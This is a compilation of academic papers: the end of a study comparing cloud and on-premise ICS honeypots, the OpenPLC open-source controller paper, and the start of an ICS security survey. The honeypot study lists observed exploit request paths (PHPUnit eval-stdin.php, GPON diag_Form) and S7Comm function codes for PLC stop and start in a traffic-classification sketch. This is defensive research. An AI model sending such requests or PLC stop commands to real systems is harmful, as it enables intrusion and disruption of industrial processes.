Each deployment exposed two services: HTTP and S7Comm. HTTP is a common service traditionally deployed both in the cloud and on-premise, whereas S7Comm is the service associated with ICS devices, which is the honey of this honeypot. Table II lists the number of unique IP addresses interacting with each service and how many of those did not belong to scanners. The ICS-related traffic is filtered by protocol: S7Comm. Table II also lists the number of HTTP exploit attempts and the number of scanner and non-scanner IP addresses interacting with the S7Comm protocol. Even though the number of S7Comm interactions was significantly smaller than the number of HTTP interactions, the recorded activity is more relevant to the ICS device. This activity is directly linked to ICS interest, which means it can be used to measure ICS deception effectiveness. The on-premise deployment attracts multiple attacks originating from a single IP address, indicating the deception advantage of this deployment. Attacks in this study are requests for PLC memory Read and for PLC Stop and Start commands. The PLC Stop and Start commands are considered attacks because they can impact the availability of the PLC, an attack type called Denial of Service. PLC memory Read requests are activity typically seen in the reconnaissance phase of an attack.
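As an illustration of how the recorded S7Comm activity can be split into the reconnaissance and availability-attack classes used in Table II, the sketch below inspects non-scanner traffic on TCP port 102. The TPKT/COTP/S7 header offsets and the function-code values (0x04 Read Var, 0x29 PLC Stop, 0x28 PLC Control) follow the public Wireshark s7comm dissector and should be treated as assumptions rather than definitions taken from this paper; the input file name is a placeholder.

```python
# Illustrative sketch: classify S7Comm requests as reconnaissance (memory Read)
# or availability attacks (PLC Stop/Start). Offsets and function codes are
# assumptions based on the public Wireshark s7comm dissector.
from collections import Counter
from scapy.all import rdpcap, IP, TCP, Raw

S7_FUNCTIONS = {0x04: "read_var (reconnaissance)",
                0x29: "plc_stop (DoS)",
                0x28: "plc_control/start (DoS)"}

def s7_function(payload: bytes):
    """Return the S7Comm job function code of a TCP/102 payload, if present."""
    if len(payload) < 5:
        return None
    cotp_len = payload[4]                     # COTP length byte follows the 4-byte TPKT header
    s7 = payload[4 + 1 + cotp_len:]
    if len(s7) < 11 or s7[0] != 0x32 or s7[1] != 0x01:   # S7 protocol id, Job PDU
        return None
    return s7[10]                             # first byte of the parameter part

counts = Counter()
for pkt in rdpcap("s7_non_scanner.pcap"):     # output of the previous filtering step
    if IP in pkt and TCP in pkt and Raw in pkt and pkt[TCP].dport == 102:
        func = s7_function(bytes(pkt[Raw].load))
        if func in S7_FUNCTIONS:
            counts[(pkt[IP].src, S7_FUNCTIONS[func])] += 1

for (src, label), n in counts.most_common():
    print(f"{src:15s} {label:28s} {n}")
```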
TABLE II. HTTP AND S7COMM INTERACTIONS WITH CLOUD AND ON-PREMISE DEPLOYMENT
Deployment | HTTP unique IP addr. | HTTP non-scanner IP addr. | HTTP unique exploit interactions | S7Comm unique IP addr. | S7Comm non-scanner IP addr. | PLC interactions (attacks)
On-premise | 1488 | 1199 | 501 | 154 | 53 | 116 (28)
Cloud | 2054 | 1790 | 1810 | 144 | 70 | 80 (0)
Table II shows that the HTTP service attracts more attention in the cloud deployment. The number of unique IP addresses, and even of non-scanner addresses, interacting with the cloud deployment is almost double, and the number of unique HTTP exploit interactions is more than triple on the cloud deployment. However, the deeper analysis that follows shows that those HTTP interactions are irrelevant to the ICS device. When observing the interactions with the S7Comm service, a shift is observed from the cloud towards on-premise. The on-premise deployment attracts more unique IP addresses than the cloud deployment that send PLC memory Read or PLC Stop and Start requests, which are also considered malicious.
Two compelling types of interactions were observed in the results. The first is the HTTP exploit interactions. These interactions came from devices that attempted to exploit known vulnerabilities in publicly exposed systems. Table III lists the HTTP exploits attempted against both the cloud and the on-premise deployments. None of the observed exploit attempts succeeded, as they only work against different types of target systems. It is hard to say why the cloud deployment was exposed to more exploit attempts. One possible explanation is that web applications like Citrix, WordPress, Apache and Outlook are often deployed in the cloud, making adversaries look for them there.
TABLE III. RECORDED HTTP EXPLOIT ATTEMPTS AGAINST CLOUD AND ON-PREMISE DEPLOYMENT
Malicious URL | Exploit description | Reference
/boaform/admin/formLogin | Fiber optic routers exploit | [12]
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | PHP exploit - remote code execution | [13]
/Autodiscover/Autodiscover.xml | Exploit of Outlook Web App with autodiscover enabled | [14]
/GponForm/diag_Form?images/ | Vulnerability in GPON home routers exploit | [15]
Other irrelevant exploit attempts were recorded. For example, it is unclear why an exploit of a fiber optic router or GPON router, as shown in Table III, was attempted against the cloud deployment: GPON routers are typically residential devices. One possible explanation is that the exploit traffic was generated by worms looking for vulnerable devices. Even though these interactions provide some intelligence about which vulnerabilities are exploited in the wild, they are of little value for ICS/OT-specific threat intelligence.
Analysing the HTTP service interactions, the attacks yield IT-relevant results that are not ICS related. The S7Comm protocol, in contrast, offers ICS-specific results. Only about 10% of the unique IP addresses interacted with S7Comm, as shown in Table II. On closer inspection, this traffic consists of reconnaissance activities that read the PLC memory blocks. These readings can be used to understand the logic currently running on the PLC, and such information can further help adversaries develop an exploit. The observed interactions with the ICS protocol provide valuable intelligence for the parties studying the ICS deployments. Furthermore, a PLC Stop and Start attempt shows that the on-premise deployment deceives an adversary. No payload deployment (ladder logic capture) and no ICS-targeted HTTP exploitation were observed.
V. CONCLUSION
This study has proposed a deployment shift of ICS honeypots from the cloud to on-premise, arguing that on-premise, physical deployments collect more relevant data than their cloud counterparts. The sign of an inefficient ICS honeypot deployment is data that is not actionable.
The experiment evaluates the deployment effects of ICS honeypots through a 65-day internet exposure and data collection. It compares a medium-interaction honeypot, HoneyPLC, deployed in two different environments: cloud and on-site. The paper demonstrates that ICS honeypots will inevitably attract mainly unrelated web-application-specific or scanner traffic; based on the observed results, such honeypots will often collect irrelevant data. However, the on-premise deployment attracts multiple attacks. This finding informs the future development of the current work in progress to validate the impact of deployment on deception capability. This validation shall be achieved by adding a third experimental deployment, a physical PLC, to serve as a control group for the expected interactions. Based on these conclusions, practitioners should consider deploying ICS honeypots on-premise, as this mimics the expected infrastructure of ICS systems.
ACKNOWLEDGMENT
This research is supported by the School of Computing, Engineering & the Built Environment at Edinburgh Napier University.
REFERENCES
[1] G. Murray, M. Johnstone and C. Valli, "The convergence of IT and OT in critical infrastructure," 2017.
[2] A. Mosteiro-Sanchez, M. Barcelo, J. Astorga and A. Urbieta, "Securing IIoT using defence-in-depth: towards an end-to-end secure industry 4.0," Journal of Manufacturing Systems, vol. 57, 2020, pp. 367-378.
[3] N. Provos, "Honeyd - a virtual honeypot daemon," 10th DFN-CERT Workshop, Hamburg, Germany, vol. 2, 2003, p. 4.
[4] I. Mokube and M. Adams, "Honeypots: concepts, approaches, and challenges," Proc. of the 45th Annual Southeast Regional Conf., 2007, pp. 321-326.
[5] T. DiNapoli, "Industrial Control Systems Cybersecurity," 2019.
[6] N. C. Rowe, T. D. Nguyen, M. M. Kendrick, Z. A. Rucker, D. Hyun and J. C. Brown, "Creating effective industrial-control-system honeypots," American Journal of Management, vol. 20, 2020, pp. 112-123.
[7] P. Ferretti, M. Pogliani and S. Zanero, "Characterizing background noise in ICS traffic through a set of low interaction honeypots," Proc. of the ACM Workshop on Cyber-Physical Systems Security & Privacy, 2019, pp. 51-61.
[8] E. López-Morales, C. Rubio-Medrano, A. Doupé, Y. Shoshitaishvili, R. Wang, T. Bao and G. Ahn, "HoneyPLC: A next-generation honeypot for industrial control systems," Proc. of the 2020 ACM SIGSAC Conf. on Computer and Communications Security, 2020, pp. 279-291.
[9] J. You, S. Lv, Y. Sun, H. Wen and L. Sun, "HoneyVP: A cost-effective hybrid honeypot architecture for industrial control systems," ICC 2021 - IEEE Int. Conf. on Communications, 2021, pp. 1-6.
[10] U. Lamping and E. Warnicke, "Wireshark user's guide," International, vol. 4, 2004.
[11] Ashiyane Digital Security Team, "GeoIP2," MaxMind, 2022.
[12] shellord, "Netlink GPON Router 1.0.11 - Remote Code Execution," Exploit Database, 2020.
[13] CVE Details, "CVE-2017-9841," 2017.
[14] Anonymous, "inurl:autodiscover/autodiscover," Exploit Database, 2016.
[15] VPN Mentor, "Critical RCE Vulnerability Found in Over a Million GPON Home Routers," 2022.
[16] Reuters, "Ukraine blames Russia for most of over 2,000 cyberattacks in 2022," 2023.
[17] C. Zhao and S. Qin, "A research for high interactive honeypot based on industrial service," 2017 3rd IEEE Int. Conf. on Computer and Communications (ICCC), 2017, pp. 2935-2939.
[18] S. Rashid, A. Haq, S. Hasan, M. Furhad, M. Ahmed and A.
Ullah, "Faking smart industry: exploring cyber-threat landscape deploying cloud-based honeypot," Wireless Networks, 2022, pp. 1-15.
OpenPLC_An_open_source_alternative_to_automation.pdf
Companies are always looking for ways to increase production. Elevated consumerism pushes factories to produce more in less time. Industrial automation came as the solution to increase quality and production and to decrease costs. Since the early 70s, the PLC (Programmable Logic Controller) has dominated industrial automation by replacing relay logic circuits. However, due to its high cost, there are many places in the world where automation is still inaccessible. This paper describes the creation of a low-cost open source PLC, comparable to those already used in industrial automation, with a modular and simplified architecture and expansion capabilities. Our goal with this project is to create the first fully functional standardized open source PLC. We believe that, with enough help from the open source community, it will become a low cost solution to speed up development and industrial production in less developed countries.
OpenPLC: An Open Source Alternative to Automation
Thiago Rodrigues Alves, Mario Buratto, Flavio Mauricio de Souza, Thelma Virginia Rodrigues
Departamento de Engenharia Eletrônica e de Telecomunicações, PUC Minas, Belo Horizonte, Brazil
[email protected]
Keywords: PLC; OpenPLC; Automation; MODBUS; Open source
I. INTRODUCTION
In the early 60s, industrial automation was usually composed of electromechanical parts like relays, cam timers and drum sequencers. They were interconnected in electrical circuits to perform the logical control of a machine. To change a machine's logic was to make an intervention on its electrical circuit, which was a long and complicated process. In 1968, the Hydra-Matic division of General Motors requested proposals for an electronic replacement for hard-wired relay systems. The winning proposal came from Bedford Associates with their 084 project. The 084 was a digital controller made to be tolerant to plant floor conditions, and was later known as a Programmable Logic Controller, or simply PLC [1]. Within a few years, the PLC started to spread all over the automotive industry, replacing relay logic machines as an easier and cheaper solution, and becoming a standard for industrial automation.
There is a strict relation between automation and development. In less developed countries, the greatest barriers are knowledge and cost. Industrial controllers are still very expensive, and companies do not provide detailed information about how these controllers work internally, as they are all closed source. The OpenPLC was created to break these two barriers, as it is fully open source and open hardware. This means that anyone can have access to all project files and information for free. This kind of project helps spread technology and knowledge to the places that need it the most. Also, the OpenPLC is made with inexpensive components to lower its cost, opening doors to automation where it wasn't ever possible before.
II. THE PLC ARCHITECTURE
The PLC, being a digital controller, shares common terms with typical PCs, like CPU, memory, bus and expansion. But there are two aspects of the PLC that differentiate it from standard computers. The first is that its hardware must be sturdy enough to survive a rugged industrial atmosphere. The second is that its software must be real time.
A. Hardware
With the exception of brick PLCs, which are not modular, the hardware of a usual PLC can be divided into five basic components:
- Rack
- Power Supply
- CPU [Central Processing Unit]
- Inputs
- Outputs
Like a human spine, the rack has a backplane at the rear allowing communication between every PLC module. The power supply plugs into the rack, providing regulated DC power to the system. The CPU is probably the most important module of a PLC. It is responsible for processing the information received from input modules and, according to the programmed logic, sending impulses to the output modules. The CPU holds its program in permanent storage and uses volatile memory to perform operations. The logic stored in the CPU's memory is continuously processed in an infinite loop. The time needed to complete a cycle of the infinite loop is called scan time. A faster CPU can achieve a shorter scan time. Input modules are used to read signals from sensors installed in the field. There are many types of input modules, depending on the sensor to be read, but they can generally be split into two categories: analog and digital. Digital input modules handle discrete signals, generated by devices that are either on or off.
Analog input modules convert a physical quantity to a digital number that can be processed by the CPU. This conversion is usually made by an ADC [Analog to Digital Converter] inside the analog input module. The type of the physical quantity to be read determines the type of the analog input module. For example, depending on the sensor, the physical value can be expressed in voltage, current, resistance or capacitance. Similarly to the input modules, output modules can control devices installed in the field. Digital output modules control devices as if with on-off switches. Analog output modules can send different values of voltage or current to control position, power, pressure or any other physical parameter. As the most significant feature of a PLC is robustness, each module must be designed with protections such as short circuit, over-current and over-voltage protection. It is also important to include a filter against RF noise.
B. Software
PCs, by design, are made to handle different tasks at the same time. However, they have difficulty handling real time events. To provide effective control, PLCs must be real time. A good definition of real time is "any information processing activity or system which has to respond to externally generated input stimuli within a finite and specified period" [2]. Real time systems don't necessarily have to be fast; they just need to give an answer before the specified period known as the deadline. Systems without real time facilities cannot guarantee a response within any timeframe. The deadline of a PLC is its scan time, so all responses must be given before, or at the moment, the scan reaches the end of the loop.
There are many accepted languages to program a PLC, but the most widely used is called ladder logic, which follows the IEC 61131-3 standard [3]. Ladder logic (see Fig. 1) was originally created to document the design and construction of relay logic circuits. The name came from the observation that these diagrams resemble ladders, with two vertical bars representing rails and many horizontal rungs between them. These electrical schematics evolved into a programming language right after the creation of the PLC, allowing technicians and electrical engineers to develop software without additional training in a computer language such as C, BASIC or FORTRAN.
Fig. 1. Example of a ladder logic diagram.
Every rung in the ladder logic represents a rule of the program. When implemented with relays and other electromechanical devices, all the rules execute simultaneously. However, when the diagram is implemented in software using a PLC, every rung is processed sequentially in a continuous loop (scan). The scan is composed of three phases: 1) reading inputs, 2) processing ladder rungs, 3) activating outputs. To achieve the effect of simultaneous and immediate execution, outputs are all toggled at the same time at the end of the scan cycle.
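A minimal sketch of this three-phase scan cycle is shown below. Python is used purely for illustration (a real PLC runtime would be embedded C); the I/O helpers, the example rung and the 10 ms scan-time value are hypothetical placeholders.

```python
# Minimal illustration of the three-phase scan cycle: 1) read inputs,
# 2) process ladder rungs, 3) activate outputs, with all outputs toggled
# together at the end of the cycle. The I/O helpers and the example rung
# are hypothetical placeholders.
import time

SCAN_TIME = 0.010  # assumed 10 ms deadline for one scan

def read_physical_inputs():
    # Placeholder for sampling the input modules over the backplane bus.
    return {"start_button": True, "stop_button": False}

def write_physical_outputs(outputs):
    # Placeholder for driving the output modules; outputs change all at once.
    print(outputs)

def process_rungs(inputs, outputs):
    # Hypothetical single rung: run the motor while start is held and stop is not.
    outputs["motor"] = inputs["start_button"] and not inputs["stop_button"]
    return outputs

outputs = {"motor": False}
for _ in range(3):  # a real PLC scans forever; three cycles keep the sketch finite
    cycle_start = time.monotonic()
    inputs = read_physical_inputs()            # phase 1: read inputs
    outputs = process_rungs(inputs, outputs)   # phase 2: process ladder rungs
    write_physical_outputs(outputs)            # phase 3: activate outputs
    # The response must be produced before the scan-time deadline expires.
    time.sleep(max(0.0, SCAN_TIME - (time.monotonic() - cycle_start)))
```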
III. THE OPENPLC HARDWARE ARCHITECTURE
The OpenPLC (see Fig. 2) was created based on the architecture of actual PLCs on the market. It is a modular system, with expansion capabilities, an RS-485 bus for communication between modules, and hardware protections. To create the first OpenPLC prototype, four boards were built:
- Bus Board
- CPU Card
- Input Card
- Output Card
Fig. 2. The OpenPLC prototype.
A. Bus Board
The bus board acts like a rack, with an integrated 5 VDC power supply. Each module connects to the bus board through a DB-25 connector. The communication between modules is made over an RS-485 bus, whose lines are on the bus board. Caution was taken while routing the RS-485 lines to avoid communication problems. Fig. 3 shows the pins and connections of each slot of the bus board. The 24 V and RS-485 grounds were separated from the rest of the circuit ground to isolate short circuits on these lines. To allow more current to flow through the power lines, the respective pins were duplicated. Three pins were used for the physical address, so that the module connected to a particular slot knows its physical position on the bus board. These pins were called D0, D1 and D2, each hardcoded with logic 1 or 0 in a binary sequence, creating different numbers from 0 to 7, one for each slot.
Fig. 3. Bus Board DB-25 connections.
B. CPU Card
The OpenPLC's brain is the CPU card. It was important to use a processor that was inexpensive, fast enough to handle all PLC operations and, most importantly, actively supported by the open source community. After some research, the processor selected was the AVR ATmega2560. This microcontroller is a high-performance, low-power Atmel 8-bit AVR RISC-based microcontroller that combines 256 KB ISP flash memory, 8 KB SRAM, 4 KB EEPROM, 86 general purpose I/O lines, 32 general purpose working registers, a real time counter, six flexible timer/counters with compare modes, PWM, 4 USARTs, a byte-oriented 2-wire serial interface, a 16-channel 10-bit A/D converter, and a JTAG interface for on-chip debugging. The device achieves a throughput of 16 MIPS at 16 MHz and operates between 4.5 and 5.5 volts [4]. The biggest reason for this choice was that the ATmega2560 is used in the Arduino family [5], a large open source community for rapid electronic prototyping with an advanced programming language called Wiring. By using this processor we made the OpenPLC compatible with Arduino code, including hundreds of libraries written for it. The CPU card also includes another important IC (Integrated Circuit), the Wiznet W5100, responsible for Ethernet communication. The Wiznet W5100 supports hardwired TCP/IP protocols like TCP, UDP, ICMP, IPv4, ARP, IGMP, PPPoE and Ethernet 10BaseT/100BaseTX, has 16 KB of internal memory for Tx/Rx buffers, and accepts a serial (over SPI) or parallel interface. This is also the official IC of the Arduino Ethernet Shield, enabling us to reuse all the code written for it on the OpenPLC. In order to communicate with the PC and download programs, the OpenPLC uses a USB port. The FT232RL from FTDI converts the serial Rx/Tx lines to the USB standard. The Arduino Mega bootloader is used to upload code to the CPU over the USB circuit.
C. Input Card
The input card is a digital input module for the OpenPLC. To process the digital inputs read by the signal conditioning circuit and send them to the CPU card, the input card uses the AVR ATmega328P, a microcontroller with the same core as the CPU card.
This made it possible to reuse parts of the code written for the CPU card, especially code related to communication over the RS-485 bus. The input signal conditioning circuit is composed mainly of an optocoupler, used to isolate the input signals from the control signals. The circuit of each input can be seen in Fig. 4. When a stimulus is applied between E1+ and E1-, a current flows through the input resistor and activates the internal LED of the optocoupler. The photons emitted by the internal LED are sensed by the phototransistor, which creates a path for the current from 5 VDC to ground, sending logic 0 to the inverter's input. As the inverter inverts the logic signal, a logic 1 is received by the microcontroller, indicating that a digital stimulus was applied at the input. The input card has 8 isolated input circuits, so each module can read up to 8 digital signals at the same time. The state of each input is sent to the CPU card over the RS-485 bus, to be processed according to the ladder logic.
Fig. 4. Isolated input circuit from the Input Card.
D. Output Card
Each output card has 8 relay-based outputs, driving up to 8 loads at the same time. It has doubly isolated outputs, as they are isolated by an optocoupler (just like the input card) and by the relay itself, which gives an additional layer of isolation. Fig. 5 shows the circuit of one isolated output from the output card. As digital processors are better at sinking current than sourcing it, the cathode of the optocoupler's internal LED is connected to an output pin on the ATmega328P. While the output pin remains at logic 1, no current flows through the LED. If the output pin goes to logic 0, a current is drawn on that pin, activating the optocoupler's internal LED. The internal phototransistor is connected to an external BC817 transistor in a Darlington configuration to increase gain. When photons are sensed by the internal phototransistor, both transistors are polarized, energizing the relay's coil. Without photons, no current flows through the coil and the relay remains off.
Fig. 5. Isolated output circuit from the Output Card.
E. Protections
There are five types of protections used in the OpenPLC circuit:
- Current limiting protection with PPTC [Polymeric Positive Temperature Coefficient]
- Over-voltage protection with TVS [Transient Voltage Suppression diode]
- Ground isolation
- Reverse polarity protection
- Noise filters
Every input and output (including the power input at the bus board) has protection against over-voltage and short circuit. These protections are achieved by using a PPTC in series with the circuit input and a TVS diode in parallel. When a high current flows through the PPTC, it reaches a high resistance with a low holding current, protecting the circuit in series. When the current is removed, it cycles back to a conductive state, enabling the circuit to work properly. Optocouplers and relays were used to isolate high power circuits from the control logic. The filled zones were connected to ground and only the low power zones of the board were filled. To isolate the communication and 24 V grounds from the filled zone, zero ohm resistors were used. To protect against reverse polarity on inputs, diodes were connected in series to allow current flow in only one direction.
Also, capacitors were placed in parallel to ground to filter noise from sensitive devices.
IV. THE OPENPLC SOFTWARE ARCHITECTURE
What differentiates a PLC from any other robust digital controller is its ability to be programmed in standardized languages. According to [3], the IEC 61131-3 standard defines five languages in which PLCs can be programmed:
- FBD [Function Block Diagram]
- Ladder Diagram
- Structured Text
- Instruction List
- SFC [Sequential Function Chart]
The most widely used language for PLCs is the Ladder Diagram. PLCs from different manufacturers might not offer all five programming languages, but they certainly have the Ladder Diagram as one of the options. For this reason, it was important to develop software able to compile a ladder diagram into code that could be understood by the CPU of the OpenPLC. The solution was partially based on LDmicro [6], an open source ladder editor, simulator and compiler for 8-bit microcontrollers. It generates native code for Atmel AVR and Microchip PIC16 CPUs from a ladder diagram. Unfortunately, the OpenPLC CPU uses the ATmega2560, which is not supported by the original LDmicro software. Also, the generated code contains only the ladder logic converted to assembly instructions, while the OpenPLC has many other functions to perform, such as communication over Ethernet for MODBUS-TCP supervisory systems, RS-485 and USB, control of the individual modules, generation of error messages and so on. For this reason, it was necessary to create an intermediate step before the final compilation, in which the ladder diagram is combined with the OpenPLC firmware. This way, the final program contains both the ladder logic and the OpenPLC functions. One of the outputs generated by LDmicro for the ladder diagram was ANSI C code. So, instead of having machine code for a specific processor, ANSI C code that could be compiled for any platform was generated. The only thing that had to be provided using this method was a C header to link the generated ANSI C functions and the target system. The OpenPLC Ladder Editor (Fig. 6) was created to fulfill these tasks. Basically, the OpenPLC Ladder Editor is a modified version of LDmicro, with a reduced instruction set (processor-specific instructions had to be removed), no support for direct compilation (it only generates ANSI C code), and a tool that can automatically link the generated ANSI C code with the OpenPLC firmware, compile everything using AVR GCC and upload the compiled software to the OpenPLC. The compiler tool is called every time the compile button is clicked. While the code for LDmicro was created using C++, the compilation tool was created using C# .NET, a very robust and modern language. The final result is a binary program uploaded to the OpenPLC CPU, containing both the ladder logic and the functions of the OpenPLC firmware.
Fig. 6. OpenPLC Ladder Editor software running on a PC.
A. MODBUS Communication
MODBUS is an industry standard protocol for automation devices. Although the message format is maintained, there are some variations of this protocol depending on the physical interface it is used on. As the OpenPLC has Ethernet over TCP/IP, support for the MODBUS-TCP protocol was implemented. Only the most used functions of the protocol were implemented, as shown next:
- FC01 - Read Coil Status
- FC02 - Read Input Status
- FC03 - Read Holding Registers
- FC05 - Force Single Coil
- FC15 - Force Multiple Coils
B. Boards Communication
To be a modular system, each module of the OpenPLC must have a way to communicate with the CPU. The RS-485 bus is the physical layer over which messages are sent, but it was necessary to create a protocol at the application layer to standardize the messages sent and received. The protocol created was called the OPLC Protocol. It is a simple protocol that encapsulates each message sent or received with information about the destination, the size of the message and the function to be executed.
TABLE I. OPLC PROTOCOL HEADER
Field: Start | Size | Function | Address | Data
Length: 1 byte | 1 byte | 1 byte | 1 byte | n bytes
Every message starts with a start byte, which is always 0x7E. The receiver will only process the message after receiving the start byte. The Size field must contain the size (in bytes) of the Data field only. The Function field is related to the Data field: what the receiver does with the received data depends on the function. Five functions were implemented for the OPLC Protocol:
- 0x01 - Ask for the card type
- 0x02 - Change card logical address
- 0x03 - Read discrete inputs
- 0x04 - Set discrete outputs
- 0x05 - Error message
The Address field may hold the logical or the physical address of the card, according to the function requested. For example, functions 0x01 and 0x02 are addressed to the physical address, because they are related to low level commands such as getting card information or changing the logical address.
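A short sketch of the OPLC framing described in Table I is given below: a 0x7E start byte, a size byte covering only the Data field, a function byte, an address byte, and then the data itself. The paper does not state whether a checksum or terminator follows the Data field, so none is added here; the example payload layout for setting outputs is an assumption, so treat this as an illustration rather than a reference implementation.

```python
# Sketch of OPLC protocol framing per Table I: Start | Size | Function | Address | Data.
# No checksum/terminator is described in the paper, so none is added; the
# output-bitmask payload in the example is an assumption.
import struct

START_BYTE = 0x7E
FUNC_READ_DISCRETE_INPUTS = 0x03
FUNC_SET_DISCRETE_OUTPUTS = 0x04

def build_frame(function: int, address: int, data: bytes = b"") -> bytes:
    """Encode an OPLC frame: Start | Size | Function | Address | Data."""
    return struct.pack("BBBB", START_BYTE, len(data), function, address) + data

def parse_frame(frame: bytes):
    """Decode an OPLC frame back into (function, address, data)."""
    start, size, function, address = struct.unpack("BBBB", frame[:4])
    if start != START_BYTE:
        raise ValueError("missing 0x7E start byte")
    return function, address, frame[4:4 + size]

# Example: ask the card at logical address 2 for its discrete inputs, then
# set outputs 0 and 3 on the same card (hypothetical one-byte bitmask payload).
request = build_frame(FUNC_READ_DISCRETE_INPUTS, 0x02)
command = build_frame(FUNC_SET_DISCRETE_OUTPUTS, 0x02, bytes([0b00001001]))
print(request.hex(), command.hex())
print(parse_frame(command))
```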
V. RESULTS
To evaluate the OpenPLC as a real PLC, a benchmark had to be made comparing it with another controller. This was achieved using a model of a five-floor building with an elevator originally controlled by a Siemens S7-200 PLC. Modifications were made to the model enabling it to interchange PLCs easily for the tests. The elevator is moved by a DC motor attached to it. There are limit switches on every floor to indicate the elevator's position, and limit switches were also installed at the top and bottom of the building to prevent the elevator from moving beyond the permitted range. Light indicators on every floor were used to visually indicate when the elevator stopped at the respective floor. Five push buttons were used to call the elevator to the desired floor. The ladder diagram for this task was already written for the Siemens PLC using the Siemens Step 7 platform. It used 13 digital inputs and 10 digital outputs to fully control the model. The diagram was printed and exactly the same diagram was written for the OpenPLC using the same logic blocks (see Figure 10). The OpenPLC Ladder Editor was used to compile, simulate and upload the diagram to the OpenPLC. During tests, a bug in the ladder diagram was found: if the user held the push button of the floor on which the elevator was located while pushing another button to send it to a different floor, the system hung in an infinite loop. As expected, the OpenPLC behaved exactly the same way as the Siemens PLC, presenting the same bug. After correcting the ladder on both controllers, each one operated flawlessly. The response to diverse stimuli on each PLC was identical in every tested situation.
VI. CONCLUSION
The open source community is growing stronger every day. There are many projects, from software to hardware, with contributions from people all around the world. Creating an open source industrial controller from scratch is a very bold task, but thanks to the support of open source communities like Arduino and LDmicro it was possible to create a prototype of a functional PLC comparable to a standardized industry controller. During tests, the OpenPLC behaved exactly the same way as other controllers, given the same input impulses. The MODBUS-TCP communication was tested using SCADA software from different vendors. It was possible to read inputs and outputs and to force outputs as on any other PLC. Our next big step is to use the OpenPLC in a field application, evaluating its robustness, versatility and ease of use.
REFERENCES
[1] P. E. Moody and R. E. Morley, "How Manufacturing Will Work in the Year 2020," Simon and Schuster.
[2] R. Oshana and M. Kraeling, "Software Engineering for Embedded Systems: Methods, Practical Techniques, and Applications," 1st ed., Newnes, 2013, pp. 12-20.
[3] K. H. John and M. Tiegelkamp, "IEC 61131-3: Programming Industrial Automation Systems," 2nd ed., Springer, 2010, pp. 147-168.
[4] Atmel Corporation, "ATmega2560," atmel.com, 2014. Accessed 8 Jul. 2014. http://www.atmel.com/devices/atmega2560.aspx.
[5] Arduino, "Arduino MEGA ADK," arduino.cc, 2014. Accessed 8 Jul. 2014. http://arduino.cc/en/Main/ArduinoBoardMegaADK.
[6] J. Westhues, "Ladder Logic for PIC and AVR," cq.cx, 2014. Accessed 8 Jul. 2014. http://cq.cx/ladder.pl.
The_Cybersecurity_Landscape_in_Industrial_Control_Systems.pdf
Industrial control systems (ICSs) are transitioning from legacy electromechanical-based systems to modern information and communication technology (ICT)-based systems, creating a close coupling between cyber and physical components. In this paper, we explore the ICS cybersecurity landscape including: 1) the key principles and unique aspects of ICS operation; 2) a brief history of cyberattacks on ICS; 3) an overview of ICS security assessment; 4) a survey of uniquely-ICS testbeds that capture the interactions between the various layers of an ICS; and 5) current trends in ICS attacks and defenses.
CONTRIBUTED PAPER
The Cybersecurity Landscape in Industrial Control Systems
This paper surveys the state of the art in industrial control system (ICS) security, identifies outstanding research challenges in this emerging area, and explains the key concepts and principles for deployment of cybersecurity methods and tools to ICSs.
By Stephen McLaughlin, Charalambos Konstantinou, Xueyang Wang, Lucas Davi, Ahmad-Reza Sadeghi, Michail Maniatakos, and Ramesh Karri
Manuscript received August 31, 2015; revised November 19, 2015; accepted December 19, 2015. Date of publication March 16, 2016; date of current version April 19, 2016. This work was supported in part by the German Science Foundation as part of Project S2 within the CRC 1119 CROSSING; by the European Union's Seventh Framework Programme under Grant 609611, PRACTICE project; and by the Intel Collaborative Research Institute for Secure Computing (ICRI-SC). The NYU researchers were also supported in part by Consolidated Edison, Inc., under Award 4265141; by the U.S. Office of Naval Research under Award N00014-15-1-2182; and by the NYU Center for Cyber Security (New York and Abu Dhabi). S. McLaughlin is with KNOX Security, Samsung Research America, Mountain View, CA 94043 USA (e-mail: [email protected]). C. Konstantinou, X. Wang, and R. Karri are with the Polytechnic School of Engineering, New York University, Brooklyn, NY 11201 USA (e-mail: [email protected]; [email protected]). L. Davi and A.-R. Sadeghi are with Technische Universität Darmstadt, Darmstadt 64289, Germany (e-mail: [email protected]; [email protected]). M. Maniatakos is with the Electrical and Computer Engineering Department, New York University Abu Dhabi, Abu Dhabi, UAE (e-mail: [email protected]).
KEYWORDS | Computer security; industrial control; networked control systems; power system security; SCADA systems; security
I. INTRODUCTION
Modern industrial control systems (ICSs) use information and communication technologies (ICTs) to control and automate stable operation of industrial processes [1], [2]. ICSs interconnect, monitor, and control processes in a variety of industries such as electric power generation, transmission and distribution, chemical production, oil and gas, refining, and water desalination. The security of ICSs is receiving attention due to their increasing connection to the Internet [3]. ICS security vulnerabilities can be attributed to several factors: the use of microprocessor-based controllers, the adoption of communication standards and protocols, and complex distributed network architectures. The security of ICSs has come under particular scrutiny owing to attacks on critical infrastructures [4], [5].
Traditional IT security solutions fail to address the coupling between the cyber and physical components of an ICS [6]. According to NIST [1], ICSs differ from traditional IT systems in the following ways. 1) The primary goal of ICSs is to maintain the integrity of the industrial process. 2) ICS processes are continuous and hence need to be highly available; unexpected outages for repair must be planned and scheduled. 3) In an ICS, interactions with physical processes are central and often complex. 4) ICSs target specific industrial processes and may not have resources for additional capabilities such as security. 5) In ICSs, timely response to human reaction and physical sensors is critical. 6) ICSs use proprietary communication protocols to control field devices. 7) ICS components are replaced infrequently (every 15-20 years or longer). 8) ICS components are distributed and isolated and hence difficult to physically access for repair and upgrade.
Attacks on ICSs are happening at an alarming pace, and the cost of these attacks is substantial for both governments and industries [7]. Cyberattacks against oil and gas infrastructure are estimated to cost the companies $1.87 billion by 2018 [8]. Until 2001, most attacks originated internal to a company. Recently, attacks external to a company are becoming frequent.
This is due to the use of commercial off-the-shelf (COTS) devices, open applications and operating systems, and the increasing connection of the ICS to the Internet. In an effort to keep up with the cyberattacks, cybersecurity researchers are investigating the attack surface and defenses for critical infrastructure domains such as the smart grid [9], oil and gas [10], and water SCADA [11]. This survey will focus on the general ICS cybersecurity landscape by discussing attacks and defenses at various levels of abstraction in an ICS, from the hardware to the process.
A. Industrial Control Systems
The general architecture of an ICS is shown in Fig. 1. The main components of an ICS include the following.
Programmable logic controller (PLC): A PLC is a digital computer used to automate industrial electromechanical processes. PLCs control the state of output devices based on the signals received from the sensors and the stored programs. PLCs operate in harsh environmental conditions, such as excessive vibration and high noise [12]. PLCs control standalone equipment and discrete manufacturing processes.
